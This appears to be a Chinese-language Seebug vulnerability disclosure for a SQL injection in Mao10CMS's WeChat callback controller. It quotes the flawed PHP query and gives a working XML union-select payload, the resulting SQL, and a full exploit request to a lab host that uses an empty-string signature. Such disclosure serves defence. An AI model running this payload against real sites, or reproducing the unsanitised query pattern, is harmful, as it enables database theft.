<ul><li>/Application/Control/Controller/WeixinController.class.php</li></ul><pre class=""> if( $tmpStr == $signature ){
echo $echostr;
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
if (!empty($postStr)){
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$fromUsername = $postObj->FromUserName;
$toUsername = $postObj->ToUserName;
$msgtype = $postObj->MsgType;
$content = trim($postObj->Content);
$date = strtotime("now");
if($content!='')
{
$return_to = M('option')->where('type="wx_huifu" AND meta_key="'.$content.'"')->getField('meta_value');
if($return_to!='') :
$return_to_user = $return_to;
else :
$return_to_user = '我没有理解您的问题,请访问我们的网站:'.mc_site_url();
endif;
echo "<xml>
<ToUserName>$fromUsername</ToUserName>
<FromUserName>$toUsername</FromUserName>
<CreateTime>$date</CreateTime>
<MsgType>text</MsgType>
<Content>$return_to_user</Content>
</xml>";
}
}
</pre><p>$content直接从用户传入的XML获取,拼接到SQL语句中导致SQL注入漏洞。</p><p>当用户传入:</p><pre class=""><?xml version="1.0" encoding="utf-8"?>
<xml>
<ToUserName>aa</ToUserName>
<MsgType>aa</MsgType>
<Content>asdasd") union select user()#</Content>
<FromUserName>a</FromUserName>
</xml>
<br></pre><p>执行的SQL语句为:<br></p><pre class="">SELECT `meta_value` FROM `mc_option` WHERE ( type="wx_huifu" AND meta_key="asdasd") union select user()#" ) LIMIT 1</pre><p>页面返回:</p><p> </p><p><img alt="57145FC8-2F19-448D-BEAF-32A75CF3B061.png" src="https://images.seebug.org/@/uploads/1434332447151-57145FC8-2F19-448D-BEAF-32A75CF3B061.png" data-image-size="364,87"><br></p><p>证明漏洞存在。</p><p>使用Hackbar,POST内容到:</p><pre class="">http://10.211.55.12/mao10cms/index.php?m=control&c=Weixin&a=callback_url&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce=&weixin_token=x</pre><p>内容为:</p><pre class=""><?xml version="1.0" encoding="utf-8"?>
<xml>
<ToUserName>aa</ToUserName>
<MsgType>aa</MsgType>
<Content>asdasd") union select user()#</Content>
<FromUserName>a</FromUserName>
</xml>
</pre><p>得到数据库当前用户:</p><p><img alt="96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" src="https://images.seebug.org/@/uploads/1434332488347-96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" data-image-size="489,270"><br></p>
暂无评论